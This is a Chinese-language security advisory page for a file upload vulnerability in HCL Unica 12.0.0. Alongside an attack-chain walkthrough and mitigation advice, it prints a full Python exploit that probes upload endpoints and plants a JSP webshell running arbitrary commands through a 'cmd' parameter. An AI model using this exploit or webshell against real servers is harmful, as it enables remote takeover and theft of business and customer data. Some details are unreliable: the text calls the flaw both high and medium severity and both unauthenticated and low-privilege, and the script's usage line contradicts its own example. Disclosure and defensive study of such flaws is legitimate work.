CVE-2025-51736 HCL Unica 12.0.0 文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-51736

漏洞类型

文件上传漏洞

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

HCL Unica 12.0.0

漏洞概述

CVE-2025-51736是HCL Technologies公司开发的Unica营销自动化平台中存在的一个高危文件上传漏洞。该漏洞允许具有低权限的远程攻击者通过未经认证的HTTP请求上传恶意文件到服务器，从而可能导致远程代码执行（RCE）、敏感数据泄露或进一步的内网渗透。HCL Unica是一套企业级营销管理解决方案，广泛应用于金融、电信、零售等行业，用于管理营销活动、客户关系和数据分析。该平台通常处理大量敏感的业务数据和客户信息，因此此类文件上传漏洞的潜在危害极为严重。攻击者可以利用此漏洞绕过正常的身份验证机制，以上传包含恶意代码的Webshell或可执行文件，进而获得服务器的完全控制权。鉴于该漏洞的CVSS评分为6.3（中等严重级别），且攻击复杂度较低，无需用户交互即可实施攻击，因此对受影响系统的安全性构成直接威胁。建议受影响的用户立即采取防护措施，并在厂商发布官方补丁后尽快进行升级。

技术细节

该文件上传漏洞存在于HCL Unica 12.0.0的Web应用接口中，攻击者可以利用平台的文件上传功能模块存在的缺陷来上传恶意文件。漏洞的根本原因在于应用程序未对上传文件的类型、内容和扩展名进行充分的验证和过滤，允许攻击者上传任意类型的文件到服务器的可执行目录中。在正常情况下，Web应用程序应该对上传文件进行多层次的安全检查，包括但不限于：文件类型白名单验证、MIME类型检查、文件内容签名验证、文件大小限制、以及将上传文件存储在非可执行目录等。然而，受影响的Unica版本在这些安全检查机制上存在明显缺陷，使得攻击者可以绕过这些限制。具体来说，攻击者可以通过构造特殊的HTTP POST请求，将包含恶意代码的文件（如JSP webshell、ASP脚本或可执行文件）上传到服务器的Web根目录或应用程序目录。一旦上传成功，攻击者可以通过HTTP请求访问这些文件，从而在服务器上执行任意系统命令或恶意代码。此外，攻击者还可以利用该漏洞上传包含恶意宏的文档文件，通过社会工程学攻击诱导其他用户下载和执行，从而实现横向移动和内网渗透。CVSS向量显示该漏洞的网络攻击向量（AV:N）和低权限要求（PR:L）意味着攻击者可以从互联网远程发起攻击，且只需拥有低权限账户即可利用此漏洞。

攻击链分析

STEP 1

1

信息收集：攻击者首先对目标HCL Unica服务器进行指纹识别，确认版本为12.0.0，并识别可用的上传端点

STEP 2

2

构造恶意文件：攻击者创建包含恶意代码的文件，如JSP webshell、可执行脚本或包含宏病毒的文档文件

STEP 3

3

发送上传请求：攻击者通过HTTP POST请求将恶意文件上传到目标服务器，绕过文件类型和内容验证机制

STEP 4

4

文件存储：恶意文件被存储在Web可访问目录中（Web根目录、 uploads目录或应用程序目录）

STEP 5

5

触发执行：攻击者通过HTTP请求访问上传的恶意文件，在服务器上执行任意系统命令或恶意代码

STEP 6

6

权限提升与持久化：攻击者利用获得的高权限执行进一步的攻击操作，如安装后门、窃取敏感数据或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-51736 PoC - HCL Unica File Upload Vulnerability
# Description: Unauthenticated remote file upload leading to RCE

def exploit(target_url, file_content, filename):
    """
    Exploit file upload vulnerability in HCL Unica 12.0.0
    
    Args:
        target_url: Base URL of vulnerable HCL Unica instance
        file_content: Malicious file content to upload
        filename: Name of the file to upload
    
    Returns:
        bool: True if upload successful, False otherwise
    """
    # Common upload endpoints in HCL Unica
    upload_endpoints = [
        "/unica/api/upload",
        "/unica/j_spring_security_check",
        "/unica/uploadservlet",
        "/api/file/upload",
        "/upload",
        "/fileupload"
    ]
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "*/*",
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary"
    }
    
    # Construct multipart form data with malicious file
    boundary = "----WebKitFormBoundary"
    data = f"""------{boundary}\r
Content-Disposition: form-data; name=\"file\"; filename=\"{filename}\"\r
Content-Type: application/octet-stream\r


{file_content}\r
------{boundary}--\r
"""
    
    for endpoint in upload_endpoints:
        try:
            url = target_url.rstrip('/') + endpoint
            print(f"[*] Trying upload endpoint: {url}")
            
            response = requests.post(url, data=data, headers=headers, timeout=10, verify=False)
            
            # Check for successful upload indicators
            if response.status_code in [200, 201, 204] or "success" in response.text.lower():
                print(f"[+] File upload appears successful via {endpoint}")
                print(f"[+] Response: {response.text[:200]}")
                
                # Attempt to access uploaded file
                access_urls = [
                    f"{target_url.rstrip('/')}/{filename}",
                    f"{target_url.rstrip('/')}/uploads/{filename}",
                    f"{target_url.rstrip('/')}/files/{filename}"
                ]
                
                for access_url in access_urls:
                    try:
                        check_response = requests.get(access_url, timeout=5, verify=False)
                        if check_response.status_code == 200:
                            print(f"[+] Uploaded file accessible at: {access_url}")
                            return True
                    except:
                        continue
                
                return True
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Error with {endpoint}: {str(e)}")
            continue
    
    print("[-] All upload attempts failed")
    return False

def generate_webshell():
    """Generate JSP webshell content for RCE"""
    return """<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter(\"cmd\");
if(cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    BufferedReader reader = new BufferedReader(new InputStreamReader(in));
    StringBuilder sb = new StringBuilder();
    String line;
    while((line = reader.readLine()) != null) {
        sb.append(line).append(\"\\n\");
    }
    out.println(\"<pre>\" + sb.toString() + \"</pre>\");
}
%>"""

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-51736.py <target_url> ")
        print("Example: python cve-2025-51736.py http://vulnerable-server:9080 shell.jsp")
        sys.exit(1)
    
    target = sys.argv[1]
    filename = sys.argv[2]
    
    print(f"[*] CVE-2025-51736 Exploit - HCL Unica File Upload RCE")
    print(f"[*] Target: {target}")
    print(f"[*] Filename: {filename}")
    
    # Generate malicious JSP webshell
    webshell = generate_webshell()
    
    # Execute exploit
    success = exploit(target, webshell, filename)
    
    if success:
        print("[+] Exploitation successful! Access webshell with: ?cmd=whoami")
    else:
        print("[-] Exploitation failed - target may not be vulnerable")

影响范围

HCL Unica 12.0.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）使用Web应用防火墙限制文件上传功能，仅允许经过验证的用户访问上传端点；2）配置服务器对上传目录的执行权限进行严格限制，阻止脚本文件的执行；3）实施网络层访问控制，限制对HCL Unica管理接口的直接访问；4）启用详细的审计日志，监控异常的文件上传行为；5）考虑暂时禁用非必要的文件上传功能，直到安全补丁可用；6）部署入侵检测系统（IDS/IPS）监控可疑的Web流量和攻击行为；7）对所有上传的文件进行强制重命名和病毒扫描，并将文件存储在与Web根目录隔离的安全位置。